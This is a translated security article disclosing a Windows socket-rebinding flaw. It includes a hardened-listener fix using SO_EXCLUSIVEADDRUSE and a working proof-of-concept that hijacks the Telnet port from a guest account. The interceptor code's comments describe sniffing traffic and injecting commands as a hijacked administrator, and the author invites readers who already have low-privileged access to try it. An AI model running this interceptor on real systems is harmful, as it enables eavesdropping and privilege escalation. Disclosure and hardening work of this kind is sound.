Port hiding, sniffing and attacks through interception of a listening port

Article submitted: flashsky (flashsky1_at_sina.com)

Author: flashsky
Email: flashsky@xfocus.org
Site: www.xfocus.net www.shopsky.com
When reprinting, please credit the original author and XFocus (Security Focus).

When writing socket server applications on Windows, statements like the following are common:
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(s, (sockaddr *)&saddr, sizeof(saddr));
This is actually a serious security risk. In the WinSock implementation a server address and port can be bound more than once, and when several bindings exist the stack decides which one receives a packet by a single rule: the most specific binding wins, with no regard to the privilege of its owner. In other words, a user with low privileges can rebind a port that a high-privileged service has opened, such as the port a system service listens on, and that is a very significant security hole.
What does this mean? It means the following attacks are possible:
1. A Trojan binds itself to a legitimate port in order to hide its own port. It uses its own packet format to decide whether an incoming packet belongs to it; if so, it handles the packet itself, otherwise it forwards it through 127.0.0.1 to the real server application for processing.
2. A Trojan running as a low-privileged user can bind the port of a high-privileged service application and sniff what the service processes. Listening to socket traffic on a host normally requires high privileges, but with socket rebinding this socket-programming flaw makes it easy to eavesdrop on that communication without any hook, hook DLL or low-level driver technique (all of which require administrator privilege).
3. Against some applications, a man-in-the-middle attack lets a low-privileged user obtain information or forge facts. For example, with only guest privileges the Telnet server's port 23 can be intercepted; although NTLM authentication prevents recovering the password by sniffing, once an administrator logs in through the console the intercepting program can act as man in the middle and send high-privileged commands over the socket as if they came from the logged-in user, achieving the intrusion.
4. For a web server built this way, an intruder only needs low-level privileges to completely alter the pages served: it is trivial to have the hijacked server answer connection requests with other content, or even to carry out e-commerce spoofing to obtain data illegitimately.

In fact, many Microsoft services have this socket programming problem. The Telnet, FTP and HTTP service implementations can all be attacked this way, with the system service intercepted by a low-privileged user. The same holds for IIS, including on Windows 2000 with SP3. If you have been able to get in, or plant a Trojan, with only low privileges and the target has these services enabled, give it a try. I estimate that many third-party services have the same vulnerability as well.
The fix is very simple: before binding in an application like the one above, call setsockopt with SO_EXCLUSIVEADDRUSE so that the socket holds the address and port exclusively instead of allowing reuse. Then nobody else can rebind the port.
The following is a simple example that intercepts the listening port of the Microsoft Telnet server; a user with only guest privileges can perform the interception successfully. What remains is tailoring it to your own needs: hiding a port, sniffing data, or spoofing high-privileged users.
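A hardened listener demonstrating the fix described above, as an added example that is not part of flashsky's article: open_hardened_listener binds with SO_EXCLUSIVEADDRUSE, and rebind_possible performs, from a second socket, the same SO_REUSEADDR bind that the rebinding attack relies on, so a service can verify at startup or in a unit test that its port cannot be taken over. The function names and the self-check design are my own. The POSIX branch exists only so the code compiles and runs outside Windows (Linux refuses to rebind an address that has an active listener, so the check passes there without any option); the Windows branch is where the article's fix actually applies.

```c
/* Added example (not the article's code): exclusive bind plus a self-check
 * that a second SO_REUSEADDR bind of the same address is refused. */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#  include <winsock2.h>
#  include <ws2tcpip.h>
#  pragma comment(lib, "ws2_32.lib")
typedef SOCKET sock_t;
#  define BAD_SOCK INVALID_SOCKET
#  define close_sock closesocket
#else
#  include <sys/socket.h>
#  include <netinet/in.h>
#  include <arpa/inet.h>
#  include <unistd.h>
typedef int sock_t;
#  define BAD_SOCK (-1)
#  define close_sock close
#endif

/* Initialise the socket library; a no-op outside Windows. Returns 0 on success. */
int net_init(void)
{
#ifdef _WIN32
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2, 2), &wsa) == 0 ? 0 : -1;
#else
    return 0;
#endif
}

/* Build an IPv4 address; port 0 lets the stack pick a free ephemeral port. */
static struct sockaddr_in make_addr(const char *ip, unsigned short port)
{
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_addr.s_addr = inet_addr(ip);
    a.sin_port = htons(port);
    return a;
}

/* Hardened listener: claim the address exclusively so that no other process,
 * whatever its privilege, can rebind it with SO_REUSEADDR. The option is set
 * BEFORE bind(), which is the only place it has any effect.
 * Returns the listening socket or BAD_SOCK. */
sock_t open_hardened_listener(const char *ip, unsigned short port)
{
    sock_t s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == BAD_SOCK) return BAD_SOCK;
#ifdef _WIN32
    BOOL on = TRUE;
    if (setsockopt(s, SOL_SOCKET, SO_EXCLUSIVEADDRUSE, (const char *)&on, sizeof on) != 0) {
        close_sock(s);
        return BAD_SOCK;
    }
#endif
    struct sockaddr_in a = make_addr(ip, port);
    if (bind(s, (struct sockaddr *)&a, sizeof a) != 0 || listen(s, 5) != 0) {
        close_sock(s);
        return BAD_SOCK;
    }
    return s;
}

/* Port the listener actually received (needed when port 0 was requested). */
unsigned short bound_port(sock_t s)
{
    struct sockaddr_in a;
    socklen_t len = sizeof a;
    if (getsockname(s, (struct sockaddr *)&a, &len) != 0) return 0;
    return ntohs(a.sin_port);
}

/* Self-check modelled on the rebinding described in the article: attempt a
 * SO_REUSEADDR bind of the same address from a second socket. Returns 1 if the
 * bind succeeds (the listener could be hijacked), 0 if the stack refuses it. */
int rebind_possible(const char *ip, unsigned short port)
{
    sock_t s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == BAD_SOCK) return 0;
    int on = 1;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (const char *)&on, sizeof on);
    struct sockaddr_in a = make_addr(ip, port);
    int ok = bind(s, (struct sockaddr *)&a, sizeof a) == 0;
    close_sock(s);
    return ok;
}

int main(void)
{
    if (net_init() != 0) return 1;
    sock_t s = open_hardened_listener("127.0.0.1", 0);   /* loopback, ephemeral port */
    if (s == BAD_SOCK) { printf("listen failed\n"); return 1; }
    unsigned short p = bound_port(s);
    printf("port %u: rebind %s\n", p, rebind_possible("127.0.0.1", p) ? "POSSIBLE" : "refused");
    close_sock(s);
    return 0;
}
```

On Windows the same check with the SO_EXCLUSIVEADDRUSE call removed and SO_REUSEADDR set instead reproduces the weak binding from the article: the second bind then succeeds and the function reports the port as hijackable, which is the condition a deployment test should flag.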

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
    WORD wVersionRequested;
    DWORD ret;
    WSADATA wsaData;
    BOOL val;
    SOCKADDR_IN saddr;
    SOCKADDR_IN scaddr;
    int err;
    SOCKET s;
    SOCKET sc;
    int caddsize;
    HANDLE mt;
    DWORD tid;

    wVersionRequested = MAKEWORD(2, 2);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("error! WSAStartup failed!\n");
        return -1;
    }
    saddr.sin_family = AF_INET;

    // The interceptor could also bind INADDR_ANY, but if it does not disturb the normal
    // application it is better to bind a specific IP address and leave 127.0.0.1 to the
    // legitimate service, then use that loopback address for forwarding so the real
    // application on the other side keeps working.
    saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
    saddr.sin_port = htons(23);
    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("error! socket failed!\n");
        return -1;
    }
    val = TRUE;
    // The SO_REUSEADDR option is what makes rebinding the port possible.
    if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val)) != 0)
    {
        printf("error! setsockopt failed!\n");
        return -1;
    }
    // If the service bound its port with SO_EXCLUSIVEADDRUSE, this bind fails and returns an error code.
    // To hide a port as thoroughly as possible, one can probe dynamically which ports can be bound
    // successfully; this vulnerability means ports can be chosen dynamically for better concealment.
    // UDP ports can be rebound the same way. The Telnet service is used here as the example.
    if (bind(s, (sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR)
    {
        ret = WSAGetLastError();
        printf("error! bind failed!\n");
        return -1;
    }
    listen(s, 2);
    while (1)
    {
        caddsize = sizeof(scaddr);
        // Accept the connection request
        sc = accept(s, (struct sockaddr *)&scaddr, &caddsize);
        if (sc != INVALID_SOCKET)
        {
            mt = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, &tid);
            if (mt == NULL)
            {
                printf("thread create failed!\n");
                break;
            }
            CloseHandle(mt);   // the thread keeps running; only the handle is released
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
    SOCKET ss = (SOCKET)lpParam;
    SOCKET sc;
    char buf[4096];
    SOCKADDR_IN saddr;
    long num;
    DWORD val;
    DWORD ret;
    // For a port-hiding application, add the checks here:
    // if the packet is your own, handle it specially; otherwise forward it through 127.0.0.1.

    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    saddr.sin_port = htons(23);
    if ((sc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("error! socket failed!\n");
        return -1;
    }
    // Receive timeout of 100 ms on both sides so the loop below can alternate between them.
    val = 100;
    if (setsockopt(sc, SOL_SOCKET, SO_RCVTIMEO, (char *)&val, sizeof(val)) != 0)
    {
        ret = WSAGetLastError();
        return -1;
    }
    if (setsockopt(ss, SOL_SOCKET, SO_RCVTIMEO, (char *)&val, sizeof(val)) != 0)
    {
        ret = WSAGetLastError();
        return -1;
    }
    if (connect(sc, (sockaddr *)&saddr, sizeof(saddr)) != 0)
    {
        printf("error! socket connect failed!\n");
        closesocket(sc);
        closesocket(ss);
        return -1;
    }
    while (1)
    {
        // The code below forwards the packet to the real application through 127.0.0.1
        // and forwards the response packet back.
        // For sniffing, the content can be analysed and recorded here.
        // For an attack on something like the Telnet server, the high-privileged login can be
        // identified here and specific packets sent to be executed as the hijacked user.
        // A recv that times out returns SOCKET_ERROR and simply falls through to the other side.
        num = recv(ss, buf, 4096, 0);
        if (num > 0)
            send(sc, buf, num, 0);
        else if (num == 0)
            break;
        num = recv(sc, buf, 4096, 0);
        if (num > 0)
            send(ss, buf, num, 0);
        else if (num == 0)
            break;
    }
    closesocket(ss);
    closesocket(sc);
    return 0;
}
